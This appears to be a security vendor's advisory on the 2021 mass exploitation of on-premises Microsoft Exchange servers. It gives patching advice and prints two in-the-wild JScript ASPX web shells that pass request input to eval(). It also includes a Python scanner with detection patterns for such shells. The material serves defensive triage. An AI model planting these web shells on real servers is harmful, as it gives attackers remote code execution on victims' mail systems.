Mass Exploitation of On-Prem Exchange Servers
Rapid Response & Resources | Updated April 14, 2021
Updated April 14: Huntress is aware of the new Microsoft Exchange vulnerabilities disclosed in the Microsoft April Security Update. Our team has yet to detect exploits targeting these new vulnerabilities on any hosts running the Huntress agent but will continue to closely monitor for these threats.
These vulnerabilities are all branded as "critical" in severity and again offer remote code execution to an attacker. Considering the strong focus on Exchange by a large number of threat actors, it is absolutely imperative that organizations patch as quickly as they can. We recommend you update to the latest security patch, monitor for new indicators of compromise and stay up-to-date on new information as it releases. We will continue to update this post with new findings.
On March 1, our team was notified of undisclosed Microsoft Exchange vulnerabilities being successfully exploited against on-prem servers. The Huntress team was able to confirm this activity, and Microsoft has since released an initial blog and emergency patches for the vulnerabilities.
This page contains additional resources and updated information about these vulnerabilities based on our latest findings and analysis. We'll continue updating with new information as it becomes available.
Our Take: While the initial discovery of these attacks is behind us, we're clearly not out of the woods yet. If you've got Exchange servers that haven't been patched (or you're not sure), now is the time to dig in and ensure you're protecting both your internal and client environments.
According to Microsoft’s initial blog, they detected multiple zero-day exploits being used to plunder on-premises versions of Microsoft Exchange Server in what they claim are “limited and targeted attacks.” They also highlight that threat actor "HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs."
Read more about the initial news of these exploits in our original blog post.
If you use on-prem Microsoft Exchange Servers, assume you’ve been hit. If you haven’t already done so, patch immediately. Now that the vulnerability is well known, multiple actors are exploiting it to compromise unpatched servers.
Once you have patched, validate the patch. Finally, look for the presence of web shells and other indicators of compromise (visit the blog for more technical details). We’ve seen cases where a system has been patched but still has web shells the actors are using.
Some common paths for web shells:
If you see unfamiliar .aspx files with random names, and their contents look like log output with an ExternalUrl line indicating the use of “JScript” code, there is a strong possibility this host is compromised.
We're also seeing some new or different instances of JavaScript being used in web shells. Some examples are below:
<%@ Page Language="Jscript" Debug=true%><%var errorSubHeader="TLsBmaDXMoWjeEkfgvcUPVCYbylzItqOuKGSxnQFRdJwhNHAirZp";var fontsize=Request.Form("Font.size.mB");var fontmin=errorSubHeader(19) + errorSubHeader(37) + errorSubHeader(2) + errorSubHeader(5) + errorSubHeader(15) + errorSubHeader(12);eval(fontsize, fontmin);%>
http://i/#<script language="JScript" runat="server">var _7tw8fs=["d5g6le","jftre"];function Page_Load(){/**/ eval(Request["wq4ywu3v"],"unsafe");}</script>
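Turning the traits above into a triage check, as an added example that is not Huntress code: it flags .aspx files carrying a JScript page directive or server-side JScript block that feeds request input to eval(), and log-style files with an ExternalUrl line. The rule names, the verdict logic and the sample strings are assumptions of this snippet, not part of the original post.

```python
"""Triage scan of ASPX files for the JScript web-shell traits above (added example, not Huntress tooling)."""
import os
import re
from typing import Dict, List

# Case-insensitive because real samples mix "Jscript" and "JScript".
RULES = [
    # Exchange's own pages are C#; a JScript page directive is out of place.
    ("jscript_directive", re.compile(r'<%@\s*Page[^%]*Language\s*=\s*"?jscript', re.I)),
    ("jscript_server_block", re.compile(r'<script[^>]*language\s*=\s*"?jscript[^>]*runat\s*=\s*"?server', re.I)),
    # eval() fed straight from the request is the one-line shell pattern.
    ("eval_request", re.compile(r'eval\s*\(\s*Request\s*(\[|\.Form|\.QueryString|\.Item)', re.I)),
    ("request_read", re.compile(r'Request\s*(\[|\.Form|\.QueryString|\.Item)', re.I)),
    # Log-style output with an ExternalUrl line is the OAB virtual-directory residue.
    ("externalurl_line", re.compile(r'^\s*ExternalUrl\s*:', re.I | re.M)),
]

def scan_aspx_text(text: str) -> List[str]:
    """Return the names of every rule the ASPX source matches (empty list = clean)."""
    return [name for name, rx in RULES if rx.search(text)]

def is_suspicious(hits: List[str]) -> bool:
    """Verdict: JScript that touches request input, or OAB ExternalUrl residue."""
    jscript = "jscript_directive" in hits or "jscript_server_block" in hits
    dynamic = "eval_request" in hits or "request_read" in hits
    return "externalurl_line" in hits or (jscript and dynamic)

def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk root for *.aspx files; map each suspicious path to its rule hits."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_aspx_text(fh.read())
            except OSError:
                continue  # unreadable file: skip it, don't abort the sweep
            if is_suspicious(hits):
                findings[path] = hits
    return findings

# Constructed samples modelled on the traits above (not copied IOCs); the last is log-style residue.
BENIGN = '<%@ Page Language="C#" AutoEventWireup="true" %>\n<html><body>ok</body></html>\n'
SHELL_DIRECTIVE = '<%@ Page Language="Jscript"%><%var a=Request.Form("k");eval(a,"unsafe");%>'
SHELL_BLOCK = 'http://i/#<script language="JScript" runat="server">function Page_Load(){eval(Request["x"],"unsafe");}</script>'
OAB_RESIDUE = 'Name        : OAB (Default Web Site)\nExternalUrl : http://i/#<script language="JScript" runat="server">var q=1;</script>\n'
```

Point scan_tree() at the IIS web roots and Exchange virtual directories on the server and review every hit by hand; a match is a lead for triage, not proof of compromise on its own.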
Yes! While these Exchange vulnerabilities wouldn't traditionally have been discovered by the Huntress platform—because the indicators of compromise (IOCs) are not persistence mechanisms—we've made some additions to the platform to specifically look for potential IOCs.
Our engineering team has also introduced new code to generate incident reports (with Assisted Remediation playbooks) for any infected agents we've detected.
If you're not a current partner and are interested in learning more, check out a demo or jump straight into a free 21-day trial.
This latest exploit is another reminder of the need for a layered approach to cybersecurity in modern IT environments. If you've got questions or are evaluating Huntress as a potential additional layer of security, our team is available to answer any of your questions.